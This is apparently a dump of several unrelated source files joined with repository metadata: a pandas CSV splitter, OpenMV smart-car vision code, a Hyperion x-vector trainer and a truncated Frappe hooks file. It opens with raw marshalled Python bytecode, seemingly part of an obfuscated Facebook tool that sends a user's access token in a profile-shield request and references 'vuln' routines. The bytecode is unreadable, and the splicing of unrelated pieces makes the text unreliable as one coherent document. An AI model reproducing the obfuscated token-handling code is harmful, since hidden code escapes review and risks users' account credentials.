access_token=%sRj\x00\x00\x00(\x05\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00RG\x01\x00\x00t\x03\x00\x00\x00uid(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\n\x00\x00\x00get_userid\xb5\t\x00\x00s\x08\x00\x00\x00\x00\x01\n\x01\x0f\x01\x12\x01c\x02\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00}\x02\x00d\x01\x00|\x01\x00t\x01\x00|\x02\x00\x83\x01\x00f\x02\x00\x16}\x03\x00i\x02\x00d\x02\x00d\x03\x006d\x04\x00
|\x00\x00\x16d\x05\x006}\x04\x00d\x06\x00}\x05\x00t\x02\x00j\x03\x00|\x05\x00d\x07\x00|\x03\x00d\x08\x00|\x04\x00\x83\x01\x02}\x06\x00|\x06\x00j\x04\x00GHd\t\x00|\x06\x00j\x04\x00k\x06\x00r\x9d\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0b\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nF\x00d\r\x00|\x06\x00j\x04\x00k\x06\x00r\xd7\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0e\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01n\x0c\x00d\x0f\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x8a\x01\x00\x00variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutations!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Types\x08\x00\x00\x00OAuth %st\r\x00\x00\x00Authorizations"\x00\x00\x00https://graph.facebook.com/graphqlRl\x00\x00\x00t\x07\x00\x00\x00headerss\x12\x00\x00\x00"is_shielded":trueR&\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivates\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x13\x00\x00\x00"is_shielded":falses.\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mNot activates\x10\x00\x00\x00\x1b[1;91m[!] 
Error(\x0b\x00\x00\x00R_\x01\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rh\x00\x00\x00Rf\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x06\x00\x00\x00enableRj\x00\x00\x00Rl\x00\x00\x00Ra\x01\x00\x00Rk\x00\x00\x00RG\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xc4\x00\x00\x00\xbb\t\x00\x00s(\x00\x00\x00\x00\x01\x0c\x01\x16\x01\x18\x01\x06\x01\x1b\x01\x08\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x02\x05\x01(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(v\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1c\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0c\x00\x00\x00R^\x00\x00\x00R\xa1\x00\x00\x00R\xce\x00\x00\x00Rd\x00\x00\x00RS\x00\x00\x00R\xbb\x00\x00\x00t\t\x00\x00\x00cookielibt\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00RU\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR(\x00\x00\x00Rb\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRT\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x14\x00\x00\x00R\x0f\x00\x00\x00R 
\x00\x00\x00R.\x00\x00\x00R#\x00\x00\x00R\xd9\x00\x00\x00R\xd2\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\xe5\x00\x00\x00R\xdc\x00\x00\x00R\x93\x00\x00\x00R\x9b\x00\x00\x00R\x9f\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00Rj\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00R\xa7\x00\x00\x00R\xa9\x00\x00\x00R&\x01\x00\x00R-\x01\x00\x00R.\x01\x00\x00R1\x01\x00\x00RV\x01\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR0\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00R=\x00\x00\x00R2\x00\x00\x00R;\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00Ru\x00\x00\x00R\x80\x00\x00\x00R\x7f\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\x89\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R?\x00\x00\x00R\x8c\x00\x00\x00R\x8d\x00\x00\x00R\x8e\x00\x00\x00Rv\x00\x00\x00R\xaa\x00\x00\x00R\xab\x00\x00\x00R\xac\x00\x00\x00R\xd0\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xe3\x00\x00\x00R\xaf\x00\x00\x00R\xf3\x00\x00\x00R\xb0\x00\x00\x00R\xfd\x00\x00\x00R\xfe\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00R\x01\x01\x00\x00R\x11\x01\x00\x00R\x10\x01\x00\x00R\x12\x01\x00\x00R\x1a\x01\x00\x00R"\x01\x00\x00R\x13\x01\x00\x00R+\x01\x00\x00R,\x01\x00\x00R\x14\x01\x00\x00R\x15\x01\x00\x00R\x16\x01\x00\x00R\x17\x01\x00\x00R\x18\x01\x00\x00R@\x01\x00\x00R?\x01\x00\x00RA\x01\x00\x00R\xfb\x00\x00\x00RB\x01\x00\x00RC\x01\x00\x00RD\x01\x00\x00R_\x01\x00\x00RW\x00\x00\x00R\xc4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s\xd2\x00\x00\x00\x90\x01\x10\x01\x03\x01\x10\x01\r\x01\x11\x01\x03\x01\x10\x01\r\x01\x11\x01\x10\x01\x10\x04\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x03\t\x05\t\x07\t\n\t\x14\x06\x03\t\x05\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t!\t\x17\t7\t\x17\t#\t\x1b\t7\t\x19\t"\t2\t;\t:\t@\t@\t7\tA\t9\tA\t\x14\t\x17\t\xb3\t\x1c\t&\t\x0f\t\x13\t\xa7\t6\t\x13\t\x14\t\x14\t=\tF\tF
\t?\t\x16\t\x1a\t\x15\t\x1e\t!\t\x15\t\x1e\t)\t$\t,\t(\t!\t"\t\x14\t\x16\t\x1a\t=\t.\t1\t\x1e\t\x06\x0c\x17'''))
|
[
"noreply@github.com"
] |
RandiSr.noreply@github.com
|
942bc1da706f608feed237c33fbfea72edac961d
|
59e1df5962e76086bc5d9f88d96115d9a92bcda6
|
/拆分文件.py
|
ad97317632c30db1e6d4aa9383f986bc6d6f131d
|
[] |
no_license
|
jiajinlong0301/ibond_jia
|
484a68b7e3c9ee265824d31e8658448c04aa1d8a
|
8dc6dd90ff68aa2f91359792837d2052e57d8576
|
refs/heads/master
| 2023-01-28T03:11:56.759342
| 2020-12-03T07:28:58
| 2020-12-03T07:28:58
| 313,263,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
import os
import pandas as pd
# filename is the source file path; file_num is the number of output files.
# Runs slightly different read options depending on whether a header row exists.
def Data_split(filename,file_num,header=True):
    """Split a comma-separated text file into ``file_num`` roughly equal parts.

    Each part is written as ``<head>_<i><tail>`` (no header row, no index),
    where ``head``/``tail`` come from ``os.path.split(filename)``.

    Args:
        filename: path of the source file (comma separated).
        file_num: number of output files to produce.
        header: True if the source has a header row (read with gbk encoding,
            as in the original); False reads with ``header=None``.
    """
    # Read options differ between the two branches of the original code.
    read_kwargs = {'sep': ','}
    if header:
        read_kwargs['encoding'] = 'gbk'
    else:
        read_kwargs['header'] = None

    # First pass: count total data rows in streaming chunks so huge files
    # never have to fit in memory at once.
    num = 0
    for chunk in pd.read_table(filename, chunksize=10000, **read_kwargs):
        num += len(chunk)

    # Rows each output file should receive (+1 avoids an extra tiny file).
    chunksize = round(num/file_num+1)
    # Split the path into directory and file name; both feed the output name.
    head, tail = os.path.split(filename)

    # Second pass: re-read with the computed chunk size and dump each chunk.
    # BUG FIXED: the header=False branch used '.foemat(' (AttributeError).
    for i, chunk in enumerate(pd.read_table(filename, chunksize=chunksize, **read_kwargs)):
        # NOTE: '{0}_{1}{2}' keeps the original naming scheme, which places
        # the output beside the source *directory* (e.g. "dir_0data.csv").
        chunk.to_csv('{0}_{1}{2}'.format(head,i,tail),header=None,index=False)
        print('保存第{0}个数据'.format(i))
# Script entry: split the hard-coded source file.
filename='/Users/jiajinlong/PycharmProjects/zk120000w.csv'
# Second argument is the number of files to split into.
Data_split(filename,2,header=True)
|
[
"jiajinlong0301@hotmail.com"
] |
jiajinlong0301@hotmail.com
|
5221169cb09ef2c4efb91362996d07102086d2d9
|
fb8b3a8d5aff40d9d3169e53d94887f3053eb891
|
/19国赛openmv/main.py
|
77bf04f6390b17960c8a744531ea18e21cc7f910
|
[] |
no_license
|
nmgzzy/smart-car-history
|
e4f887da98bd53a59ac8c0c42cc3933d59d4e8a1
|
7d5f7eecb9692792a345ef8092add42013e2bb4a
|
refs/heads/master
| 2021-04-01T21:15:26.868584
| 2020-03-18T12:16:15
| 2020-03-18T12:16:15
| 248,215,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,989
|
py
|
import sensor, image, time, pyb
import my_ips, my_file, my_uart, my_key
# --- Camera and display setup ---
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framerate(2<<11)
sensor.set_framesize(sensor.QQVGA)#160x120
my_ips.init()
sensor.skip_frames(time = 500)
# Lock gain and white balance so colour thresholds stay stable between frames.
sensor.set_auto_gain(False)
sensor.set_auto_whitebal(False)
sensor.skip_frames(time = 100)
clock = time.clock()
# Status LEDs on the board; all switched on at boot.
ledR = pyb.LED(1)
ledG = pyb.LED(2)
ledB = pyb.LED(3)
ledB.on()
ledR.on()
ledG.on()
# UI state: index of the currently highlighted threshold cell, and a counter
# for saved snapshot file names.
colorxy = 0
img_cnt = 0
# Colour thresholds as 6-value min/max triples (presumably LAB ranges for
# find_blobs — confirm against OpenMV docs). Four alternative red sets.
red_threshold = [[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[0, 70, 19, 90, -11, 35]]
blue_threshold = [0, 50, -128, 127, -128, -5]
black_threshold = [0, 15, -128, 127, -128, 127]
white_threshold = [40, 100, -128, 127, -128, 127]
red_ch = 0  # index of the active red threshold set
# Regions of interest (x, y, w, h) within the 160x120 frame.
roi_white = [(109,0,2,120),(113,0,2,120),(117,0,2,120),(121,0,2,120)]
roi_white2 = [73,0,2,120]
roi_blue = [(0,21,33,77),(12,21,56,77),(0,21,68,77)]
roi_red = (47,25,103,70)
chioce = 2  # which roi_white column is used (sic: "choice")
def find_max(blobs):
    """Return the blob with the largest bounding-box area (width * height).

    Args:
        blobs: iterable of blob-like sequences where index 2 is the bounding
            box width and index 3 is its height.

    Returns:
        The largest blob, or None when ``blobs`` is empty (the original code
        raised NameError in that case because ``max_blob`` was never bound).
    """
    max_blob = None
    max_size = -1  # -1 so even a zero-area blob can be selected
    for blob in blobs:
        area = blob[2]*blob[3]  # compute the area once per blob
        if area > max_size:
            max_blob = blob
            max_size = area
    return max_blob
def my_cmp(a, b):
    """Pick a highlight colour: green when *a* equals *b*, white otherwise."""
    return (20,255,20) if a == b else (255,255,255)
def display(page, x, y, k, save):
    """Render one threshold-tuning UI frame and apply one tuning step.

    Args:
        page: UI page; page 0 pushes the frame to the IPS screen.
        x, y: currently selected tuning cell (column/row of the UI grid).
        k: increment applied to the selected threshold value (-1, 0 or +1).
        save: when truthy, the raw frame is saved as img\\imgNN.jpg first.
    """
    global img_cnt
    global red_ch
    clock.tick()
    img = sensor.snapshot()
    if save:
        # Save the raw frame before any overlays are drawn on it.
        img.save("img\\img%02d.jpg"%img_cnt)
        img_cnt += 1
    global colorxy
    # Preview the current red / blue+black / white blob detections.
    blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
    if blobs:
        road = find_max(blobs)
        img.draw_rectangle(road.rect())
    blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[2], x_stride=3, y_stride=6, pixels_threshold=64)
    if blobs:
        road = find_max(blobs)
        img.draw_rectangle(road.rect())
    blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=9)
    if blobs:
        road = find_max(blobs)
        img.draw_rectangle(road.rect())
    print(clock.fps())
    # Binarize with the threshold currently being edited so its effect shows.
    if x == 3 and y == 0:
        img.binary([white_threshold], zero = True)
    else:
        if y < 2:
            img.binary([red_threshold[red_ch]], zero = True)
        else:
            img.binary([blue_threshold], zero = True)
    # Overlay the numeric threshold values; the selected one renders green
    # (my_cmp compares each cell index against colorxy).
    img.draw_string(0,0, str(red_threshold[red_ch][0]),color = my_cmp(colorxy, 0),x_spacing = -2)
    img.draw_string(0,10, str(red_threshold[red_ch][1]),color = my_cmp(colorxy, 1),x_spacing = -2)
    img.draw_string(40,0, str(red_threshold[red_ch][2]),color = my_cmp(colorxy, 2),x_spacing = -2)
    img.draw_string(40,10,str(red_threshold[red_ch][3]),color = my_cmp(colorxy, 3),x_spacing = -2)
    img.draw_string(80,0, str(red_threshold[red_ch][4]),color = my_cmp(colorxy, 4),x_spacing = -2)
    img.draw_string(80,10,str(red_threshold[red_ch][5]),color = my_cmp(colorxy, 5),x_spacing = -2)
    img.draw_string(0, 20,"red", color = (255,255,255), x_spacing = -2)
    img.draw_string(120,0,"wt:", color = my_cmp(colorxy, 6),x_spacing = -2)
    img.draw_string(140,0,str(white_threshold[0]),color = my_cmp(colorxy, 6),x_spacing = -2)
    img.draw_string(120,10,str(red_ch), color = (255,255,0), x_spacing = -2)
    img.draw_string(0,90, "blue", color = (255,255,255), x_spacing = -2)
    img.draw_string(0,100, str(blue_threshold[0]),color = my_cmp(colorxy, 8),x_spacing = -2)
    img.draw_string(0,110, str(blue_threshold[1]),color = my_cmp(colorxy, 9),x_spacing = -2)
    img.draw_string(40,100,str(blue_threshold[2]),color = my_cmp(colorxy, 10),x_spacing = -2)
    img.draw_string(40,110,str(blue_threshold[3]),color = my_cmp(colorxy, 11),x_spacing = -2)
    img.draw_string(80,100,str(blue_threshold[4]),color = my_cmp(colorxy, 12),x_spacing = -2)
    img.draw_string(80,110,str(blue_threshold[5]),color = my_cmp(colorxy, 13),x_spacing = -2)
    img.draw_string(120,110, "blk", color = my_cmp(colorxy, 14),x_spacing = -2)
    img.draw_string(140,110,str(black_threshold[1]),color = my_cmp(colorxy, 14),x_spacing = -2)
    if page == 0:
        my_ips.display_QQVGA(0, 0, img)
    # Apply the tuning step to the threshold cell selected by (x, y) and
    # remember its index in colorxy so the next frame highlights it.
    if x == 0:
        if y == 0:
            red_threshold[red_ch][0] += k
            colorxy = 0
        elif y == 1:
            red_threshold[red_ch][1] += k
            colorxy = 1
        elif y == 2:
            blue_threshold[0] += k
            colorxy = 8+0
        elif y == 3:
            blue_threshold[1] += k
            colorxy = 8+1
    elif x == 1:
        if y == 0:
            red_threshold[red_ch][2] += k
            colorxy = 2
        elif y == 1:
            red_threshold[red_ch][3] += k
            colorxy = 3
        elif y == 2:
            blue_threshold[2] += k
            colorxy = 8+2
        elif y == 3:
            blue_threshold[3] += k
            colorxy = 8+3
    elif x == 2:
        if y == 0:
            red_threshold[red_ch][4] += k
            colorxy = 4
        elif y == 1:
            red_threshold[red_ch][5] += k
            colorxy = 5
        elif y == 2:
            blue_threshold[4] += k
            colorxy = 8+4
        elif y == 3:
            blue_threshold[5] += k
            colorxy = 8+5
    elif x == 3:
        if y == 0:
            white_threshold[0] += k
            colorxy = 6
        elif y == 1:
            red_ch += k
            colorxy = 7
        elif y == 3:
            black_threshold[1] += k
            colorxy = 8+6
def systemUI():
    """Interactive threshold-tuning loop.

    Loads saved thresholds, then reads the keypad each frame: keys 3/6/2/0
    move the selection, key 1 saves a snapshot, keys 4/5 increment/decrement
    the selected value. Exits when 0x0F arrives over UART, persisting the
    thresholds and shutting the display down.
    """
    page = 0
    Xsite = 0
    Ysite = 0
    global red_threshold
    global blue_threshold
    global black_threshold
    global white_threshold
    global red_ch
    # Restore the previously saved parameter set.
    [red_threshold, blue_threshold, black_threshold, white_threshold, red_ch] = my_file.read_parameter()
    # Static side-panel help text (value ranges per channel).
    my_ips.showstr(161, 0, "bR 30:127")
    my_ips.showstr(161, 1, " -50:50")
    my_ips.showstr(161, 3, "R 40:127")
    my_ips.showstr(161, 4, " -20:70")
    my_ips.showstr(161, 6, "yR 30:127")
    my_ips.showstr(161, 7, " 10:127")
    while(True):
        save = 0
        key = my_key.get_key()
        if key == 3:#r
            if Xsite<3:
                Xsite += 1
        elif key == 6:#l
            if Xsite>0:
                Xsite -= 1
        elif key == 2:#u
            if Ysite>0:
                Ysite -= 1
        elif key == 0:#d
            if Ysite<3:
                Ysite += 1
        elif key == 1:#m  (middle key: save a snapshot this frame)
            save = 1
        # Keys 4/5 adjust the selected value up/down by one.
        if key == 4:
            k = 1
        elif key == 5:
            k = -1
        else:
            k = 0
        display(page, Xsite, Ysite, k, save)
        # 0x0F over UART ends the tuning session.
        if my_uart.read() == 0x0F:
            break
    # Persist the tuned thresholds, then release the display and LEDs.
    my_file.save_parameter(red_threshold, blue_threshold, black_threshold, white_threshold, red_ch)
    ledR.off()
    ledB.off()
    my_ips.spi.deinit()
    time.sleep(200)
    ledG.off()
def main():
    """Main vision loop: measure the red marker, blue/black "break" region
    and white line each frame and stream the results over UART forever.

    Each UART byte read carries a mode flag in bit 7 and a 7-bit offset that
    steers the white-line search window while in the default mode.
    """
    # BUG FIX: offset must exist before its first use — the default
    # (mode == 0) white-line branch reads it even before any UART byte has
    # arrived, which raised NameError in the original code. It persists
    # across iterations, keeping the last received value.
    offset = 0
    while True:
        clock.tick()
        pix = 0
        break_road = 0
        mode = 0
        hh = 0
        cc = 0
        img = sensor.snapshot()
        t = my_uart.read()
        if t is not None:
            mode = t >> 7
            offset = t & 0x7F
        # Red marker size, scaled into 0..255.
        blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
        if blobs:
            road = find_max(blobs)
            pix = road.pixels() * 255 // 3000
            if pix > 255:
                pix = 255
        # Blue/black "break" amount; ROI and scaling depend on the mode.
        if mode == 0:
            blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[0], x_stride=3, y_stride=6, pixels_threshold=100)
            if blobs:
                road = find_max(blobs)
                break_road = road.pixels()*255//2500
        else:
            blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[1], x_stride=3, y_stride=6, pixels_threshold=100)
            if blobs:
                road = find_max(blobs)
                break_road = (road.pixels()-150)*255//3400
        # Clamp to the single-byte range sent over UART.
        if break_road < 0:
            break_road = 0
        if break_road > 255:
            break_road = 255
        # White line height/centre; in the default mode the search column
        # tracks the UART-supplied offset.
        if mode == 1:
            blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=20)
            if blobs:
                road = find_max(blobs)
                hh = road.h()
                cc = road.cy()+1
        else:
            roi_white2[0] = int(-0.3297*offset+106.2)-3
            blobs = img.find_blobs([white_threshold], roi = roi_white2, pixels_threshold=20)
            if blobs:
                road = find_max(blobs)
                hh = road.h()
                cc = road.cy()+1
        my_uart.send(pix,break_road,cc,hh)
        # LEDs mirror the detections for on-track debugging.
        if pix > 30:
            ledR.on()
        else:
            ledR.off()
        if break_road > 170:
            ledB.on()
        else:
            ledB.off()
        print(clock.fps())
# Run the tuning UI first (exits on UART 0x0F), then the main vision loop.
systemUI()
main()
|
[
"283003556@qq.com"
] |
283003556@qq.com
|
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139
| 2022-03-25T16:28:08
| 2022-03-25T16:28:08
| 175,275,679
| 55
| 20
|
Apache-2.0
| 2023-09-13T15:35:46
| 2019-03-12T18:40:19
|
Python
|
UTF-8
|
Python
| false
| false
| 5,015
|
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
    """Trainer to train x-vector style models.

    Attributes:
      model: x-Vector model object.
      optim: pytorch optimizer object or options dict
      epochs: max. number of epochs
      exp_path: experiment output path
      cur_epoch: current epoch
      grad_acc_steps: gradient accumulation steps to simulate larger batch size.
      device: cpu/gpu device
      metrics: extra metrics to compute besides cxe.
      lrsched: learning rate scheduler object or options dict
      loggers: LoggerList object, loggers write training progress to std. output and file.
        If None, it uses default loggers.
      ddp: if True use distributed data parallel training
      ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
      loss: if None, it uses cross-entropy
      train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
      use_amp: uses mixed precision training.
      log_interval: number of optim. steps between log outputs
      use_tensorboard: use tensorboard logger
      use_wandb: use wandb logger
      wandb: wandb dictionary of options
      grad_clip: norm to clip gradients, if 0 there is no clipping
      grad_clip_norm: norm type to clip gradients
      swa_start: epoch to start doing swa
      swa_lr: SWA learning rate
      swa_anneal_epochs: SWA learning rate anneal epochs
      cpu_offload: CPU offload of gradients when using fully sharded ddp
    """

    def __init__(
        self,
        model,
        # NOTE(review): mutable defaults ({}) are shared across calls; safe
        # only as long as they are never mutated in place — confirm upstream.
        optim={},
        epochs=100,
        exp_path="./train",
        cur_epoch=0,
        grad_acc_steps=1,
        device=None,
        metrics=None,
        lrsched=None,
        loggers=None,
        ddp=False,
        ddp_type="ddp",
        loss=None,
        train_mode="train",
        use_amp=False,
        log_interval=10,
        use_tensorboard=False,
        use_wandb=False,
        wandb={},
        grad_clip=0,
        grad_clip_norm=2,
        swa_start=0,
        swa_lr=1e-3,
        swa_anneal_epochs=10,
        cpu_offload=False,
    ):
        """Builds the trainer; see the class docstring for argument meanings."""
        # Cross-entropy is the default x-vector classification loss.
        if loss is None:
            loss = nn.CrossEntropyLoss()
        # Everything else is delegated to the generic TorchTrainer base.
        super().__init__(
            model,
            loss,
            optim,
            epochs,
            exp_path,
            cur_epoch=cur_epoch,
            grad_acc_steps=grad_acc_steps,
            device=device,
            metrics=metrics,
            lrsched=lrsched,
            loggers=loggers,
            ddp=ddp,
            ddp_type=ddp_type,
            train_mode=train_mode,
            use_amp=use_amp,
            log_interval=log_interval,
            use_tensorboard=use_tensorboard,
            use_wandb=use_wandb,
            wandb=wandb,
            grad_clip=grad_clip,
            grad_clip_norm=grad_clip_norm,
            swa_start=swa_start,
            swa_lr=swa_lr,
            swa_anneal_epochs=swa_anneal_epochs,
            cpu_offload=cpu_offload,
        )

    def train_epoch(self, data_loader):
        """Training epoch loop

        Args:
          data_loader: pytorch data loader returning features and class labels.

        Returns:
          ODict of accumulated training metrics (keys prefixed with
          "train_") plus the current learning rate under "lr".
        """
        # Lets the model adjust its loss margin based on the current epoch.
        self.model.update_loss_margin(self.cur_epoch)
        metric_acc = MetricAcc(device=self.device)
        batch_metrics = ODict()
        self.set_train_mode()
        for batch, (data, target) in enumerate(data_loader):
            self.loggers.on_batch_begin(batch)
            # Gradients are cleared only at the start of each accumulation
            # window, so grad_acc_steps mini-batches share one optimizer step.
            if batch % self.grad_acc_steps == 0:
                self.optimizer.zero_grad()
            data, target = data.to(self.device), target.to(self.device)
            batch_size = data.shape[0]
            with self.amp_autocast():
                output = self.model(data, target, **self.amp_args)
                # Divide so the accumulated gradient matches one large batch.
                loss = self.loss(output, target).mean() / self.grad_acc_steps
            if self.use_amp:
                # AMP: scale the loss to avoid fp16 gradient underflow.
                self.grad_scaler.scale(loss).backward()
            else:
                loss.backward()
            if (batch + 1) % self.grad_acc_steps == 0:
                # LR scheduler steps per optimizer step, except while SWA
                # controls the learning rate.
                if self.lr_scheduler is not None and not self.in_swa:
                    self.lr_scheduler.on_opt_step()
                self.update_model()
            # Undo the accumulation scaling when reporting the loss.
            batch_metrics["loss"] = loss.item() * self.grad_acc_steps
            for k, metric in self.metrics.items():
                batch_metrics[k] = metric(output, target)
            metric_acc.update(batch_metrics, batch_size)
            logs = metric_acc.metrics
            logs["lr"] = self._get_lr()
            self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
        logs = metric_acc.metrics
        logs = ODict(("train_" + k, v) for k, v in logs.items())
        logs["lr"] = self._get_lr()
        return logs
|
[
"jesus.antonio.villalba@gmail.com"
] |
jesus.antonio.villalba@gmail.com
|
374b46162c7dde768082c279d494fa3a42728b61
|
ff623c438f0089cf23cdb089fde693e340882164
|
/metabase_ngse/hooks.py
|
27e6dd5cb62016922011c60514f74400182b1747
|
[
"MIT"
] |
permissive
|
Suraj787/metabase_ngse
|
eb1de77ff4e86685db0f2f98bb2a8376b5cd654a
|
be626804148650af73bb00926ed9052201274c04
|
refs/heads/master
| 2023-01-04T12:30:51.092201
| 2020-10-31T20:47:27
| 2020-10-31T20:47:27
| 308,969,125
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
# Frappe app metadata consumed by the framework's hook loader.
app_name = "metabase_ngse"
app_title = "Metabase Ngse"
app_publisher = "firsterp"
app_description = "Metabase for Nandan GSE"
app_icon = "octicon octicon-file-directory"  # octicon icon classes
app_color = "grey"
app_email = "support@firsterp.in"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# app_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js, css files in header of web template
# web_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# web_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "metabase_ngse.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "metabase_ngse.install.before_install"
# after_install = "metabase_ngse.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "metabase_ngse.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
# "metabase_ngse.tasks.all"
# ],
# "daily": [
# "metabase_ngse.tasks.daily"
# ],
# "hourly": [
# "metabase_ngse.tasks.hourly"
